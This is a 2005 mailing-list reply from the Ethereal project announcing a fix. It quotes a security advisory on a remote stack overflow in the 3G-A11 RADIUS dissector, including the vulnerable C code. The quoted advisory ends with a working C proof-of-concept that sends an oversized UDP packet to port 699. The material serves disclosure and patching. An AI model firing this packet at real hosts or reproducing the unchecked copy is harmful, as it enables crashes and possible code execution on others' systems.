Re: Ethereal remote buffer overflow
Ethereal 0.10.10 will be released on Thursday, March 10. It will fix
this as well as two other security and stability-related issues. If you
need a fix immediately, you can download source tarballs and Windows
installers from
http://www.ethereal.com/distribution/buildbot-builds/
LSS Security wrote:
> LSS Security Advisory #LSS-2005-03-04
> http://security.lss.hr
>
> ---
>
> Title : Ethereal remote buffer overflow
> Advisory ID : LSS-2005-03-04
> Date : 08.03.2005
> Advisory URL: : http://security.lss.hr/en/index.php?page=exp
> Impact : Stack overflow and possible code execution
> Risk level : High
> Vulnerability type : Remote
> Vendors contacted : Yes
>
> ---
>
>
>
>
> ===[ Overview
>
> Ethereal is used by network professionals around the world for
> troubleshooting,
> analysis, software and protocol development, and education. It has all of the
> standard features you would expect in a protocol analyzer, and several
> features not seen in any other product. Its open source license allows
> talented
> experts in the networking community to add enhancements. It runs on all
> popular
> computing platforms, including Unix, Linux, and Windows.
>
>
>
> ===[ Vulnerability
>
> There is remote buffer overflow vulnerability in Ethereal dissector for
> CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius()
> function
> in packet-3g-a11.c used for RADIUS authentication dissection. Number of bytes
> that will be copied from packet to buffer in stack is taken from packet
> itself.
> 16 bytes are reserved for that buffer, and string length can be up to 256
> bytes
> (unsigned char), so is possible to overflow local variables and return
> address.
>
>
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
> size_t radius_len;
> ...
> guchar str_val[MAX_STRVAL];
> ...
> radius_len = tvb_get_guint8(tvb, offset + 1);
> ...
> strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2);
> ...
> }
> ----------------
>
> A similar vulnerability was also found in same function few lines below where
> RADIUS attributes are copied to stack.
>
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
> guint attribute_len;
> ...
> guchar str_val[MAX_STRVAL];
> ...
> attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
> ...
> case ATTR_TYPE_STR:
> strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
> attribute_len - 2);
>
> ...
> }
> ----------------
>
>
>
> ===[ Affected versions
>
> All versions after 3G-A11 dissector was added to CVS including latest 0.10.9.
> Vulnerability was tested with latest Ethereal on Linux and Windows.
>
>
>
> ===[ Fix
>
> It seems that that they have fixed that vulnerability just few days ago,
> and new version will probably be available soon from http://www.ethereal.com.
>
>
>
> ===[ PoC Exploit
>
> Exploit is in attachment, and URL http://security.lss.hr/en/PoC/
>
>
>
> ===[ Credits
>
> Credits for this vulnerability goes to Leon Juranic.
>
>
>
> ===[ LSS Security Contact
>
> LSS Security Team, <eXposed by LSS>
>
> WWW : http://security.lss.hr
> E-mail : security@xxxxxx
> Tel : +385 1 6129 775
>
>
>
>
>
>
> ------------------------------------------------------------------------
>
> /*
> *
> * Ethereal 3G-A11 remote buffer overflow PoC exploit
> * --------------------------------------------------
> * Coded by Leon Juranic <ljuranic@xxxxxx>
> * LSS Security <http://security.lss.hr/en/>
> *
> */
>
> #include <stdio.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <netdb.h>
>
>
> main (int argc, char **argv)
> {
> int sock;
> struct sockaddr_in sin;
> unsigned char buf[1024];
> char bla[200];
>
> sock=socket(AF_INET,SOCK_DGRAM,0);
>
> sin.sin_family=AF_INET;
> sin.sin_addr.s_addr = inet_addr(argv[1]);
> sin.sin_port = htons(699);
>
> buf[0] = 22;
> memset(buf+1,'A',19);
> buf[20] = 38;
> *(unsigned short*)&buf[22] = htons(100);
> *(unsigned short*)&buf[28] = 0x0101;
> buf[30] = 31;
> buf[31] = 150; // len for overflow...play with this value if it
> doesn't work
>
> memset (bla,'B',200);
> strncpy (buf+32,bla,180);
>
> sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
> }
>
>